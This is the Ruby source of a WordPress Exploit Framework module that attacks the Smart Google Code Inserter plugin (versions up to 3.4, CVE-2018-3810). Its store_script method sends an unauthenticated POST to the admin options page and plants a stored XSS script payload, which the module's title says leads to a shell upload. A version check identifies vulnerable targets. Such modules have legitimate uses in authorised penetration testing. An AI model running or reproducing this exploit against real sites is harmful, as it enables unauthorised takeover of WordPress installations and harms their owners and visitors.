# frozen_string_literal: true

class Wpxf::Exploit::SmartGoogleCodeInserterXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::StoredXss

  def initialize
    super

    update_info(
      name: 'Smart Google Code Inserter <= 3.4 Unauthenticated Stored XSS Shell Upload',
      author: [
        'Benjamin Lim', # Disclosure
        'rastating'     # WPXF module
      ],
      references: [
        ['CVE', '2018-3810'],
        ['WPVDB', '8987']
      ],
      date: 'Jan 01 2018'
    )
  end

  def check
    check_plugin_version_from_readme('smart-google-code-inserter', '3.5')
  end

  def store_script
    execute_post_request(
      url: normalize_uri(wordpress_url_admin, 'options-general.php'),
      params: { 'page' => 'smartcode' },
      body: {
        'sgcgoogleanalytic' => "<script>#{xss_include_script}</script>",
        'sgcwebtools' => '',
        'button' => 'Save Changes',
        'action' => 'savegooglecode'
      }
    )
  end
end
